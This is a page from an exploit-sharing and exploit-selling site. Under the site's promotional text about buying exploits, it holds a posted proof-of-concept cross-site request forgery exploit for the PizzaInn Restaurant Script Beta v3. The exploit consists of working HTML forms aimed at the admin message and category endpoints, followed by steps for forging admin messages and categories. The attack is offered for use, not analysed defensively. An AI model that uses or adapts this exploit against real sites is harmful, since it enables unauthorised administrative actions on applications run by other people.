0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
PizzaInn Beta 3 Cross Site Request Forgery Vulnerability
# Exploit Title :----------------- : PizzaInn Restaurant Scripti (Beta v3) - (message-exec.php) - CSRF Send Inbox Message. # Author :------------------------ : Nassim Asrir # Author Company :------------------------ : HenceForth # Author Email :------------------------ : wassline@gmail.com # Google Dork :---------------- : - # Date :-------------------------- : 20/10/2016 # Type :-------------------------- : webapps # Platform : -------------------- : PHP # Software link : -------------- : http://wmscripti.com/php-scriptler/pizzainn-restaurant-scripti-beta-v3.html ############################ CSRF Send Inbox Message Vulnerabilty ############################ ## Exploit ## <h1>Messages Management </h1> </div> <div id="container"> <form id="messageForm" name="messageForm" method="post" action="http://localhost/script/admin/message-exec.php" onsubmit="return messageValidate(this)"> <table width="540" border="0" cellpadding="2" cellspacing="0" align="center"> <CAPTION><h3>SEND A MESSAGE</h3></CAPTION> <tr> <th width="200">Subject</th> <td width="168"><input type="text" name="subject" id="subject" class="textfield" /></td> </tr> <tr> <th width="200">Message Box</th> <td width="168"><textarea name="txtmessage" class="textfield" rows="5" cols="60"></textarea></td> </tr> <tr> <td>&nbps;</td> <td align="center"><input type="submit" name="Submit" value="Send Message" /> <input type="reset" name="Reset" value="Clear Field" /></td> </tr> </table> </form> <hr> <table border="0" width="1000" align="center"> <CAPTION><h3>CSRF By Nassim Asrir</h3></CAPTION> ############################ CSRF Add Category Vulnerabilty ############################ ## Exploit ## <html> <title>CSRF Exploit By Nassim Asrir</title> <CAPTION><h3>ADD A NEW CATEGORY</h3></CAPTION> <form name="categoryForm" id="categoryForm" action="http://Site/script/admin/categories-exec.php" method="post" onsubmit="return categoriesValidate(this)"> <tr> <th>Name</th> </tr> <tr> <td><input type="text" name="name" class="textfield" /></td> <td><input type="submit" name="Submit" value="Add" /></td> </tr> </form> </table> </html> ## Proc ## - P.S: You must to register in the site to see the Inbox Message send by Admin. - Create a .html File and Put the Code. - Navigate the File in your Localhost . - and Create Message in The Text Box and you redirect to http://site/script/admin/access-denied.php - and You get the Message "Access Denied! You do not have access to this resource." but don't worry. when you get the Message go to Your account . and you can see [Inbox] Navigate it and you see the Message . # 0day.today [2024-11-15] #